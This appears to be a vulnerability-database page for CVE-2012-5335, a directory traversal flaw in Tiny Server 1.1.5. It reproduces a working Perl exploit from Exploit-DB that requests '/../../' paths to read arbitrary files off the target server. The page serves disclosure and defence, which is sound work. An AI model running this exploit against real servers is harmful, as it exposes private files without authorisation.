VIR Vulnerability Intelligence Relay

CVE-2012-5335

medium
Published 2012-10-08 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
5.0

Description

Directory traversal vulnerability in Tiny Server 1.1.5 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the URI of an HTTP request.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-18610 remote windows verified perl ยท 2 KB
KaHPeSeSe ยท 2012-03-16

Tiny Server 1.1.5 - Arbitrary File Disclosure

perl exploit Source: Exploit-DB 
#!/usr/bin/perl -w
#Title  : Tiny Server v1.1.5 Arbitrary File Disclosure Exploit
#Author : KaHPeSeSe
#Test   : PERFECT XP PC1 / SP3
#Date   : 15/03/2012
#Thanks : exploit-db.com

use LWP::Simple;
use LWP::UserAgent;

	system('color','A');
	system('cls');
	
			print "\n\t____________________________________________________________________\n";
			print "\n\t....... Tiny Server v1.1.5 Arbitrary File Disclosure Exploit .......\n";
			print "\n\t....... Founded and Exploited by KaHPeSeSe                   .......\n";
			print "\n\t____________________________________________________________________\n\n";

	if(@ARGV < 3)
		{
			print "[-] Error!\n";
			print "[-] Look to example\n\n";
			&help; exit();
											}
	sub help()
		{
			print "[+] How  to : perl $0 IP Port File\n";
			print "[+] Example : perl $0 192.168.1.2 80 windows/system.ini\n";
											}
			($TargetIP, $Port, $File) = @ARGV;
			print("Connet to Server.... \n");
			sleep(2);
			$path="/../../";
			my $link = "http://" . $TargetIP . ":" . $Port . $path . $File;
			print("Connected\n");
			sleep(2);
			print("Waiting for moment\n");
			sleep(1);
			print("Done! Reading $File...\n");
			sleep(3);
			$ourfile=get $link;
	if($ourfile)
		{
			print("\n\n____________________________________________________\n\n");
			print("$ourfile \n\n");
			print("_____________________________________________________\n\n");
											}
	else
	{
			print("_____________________________________________________\n\n");
			print(" Not Found !!!\n\n");
			print("_____________________________________________________\n\n");
			exit;
											}

Application impact
VendorProductVersionsFixed
saurabh_guptatiny_server1.1.5

References

CWEs

CWE-22

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.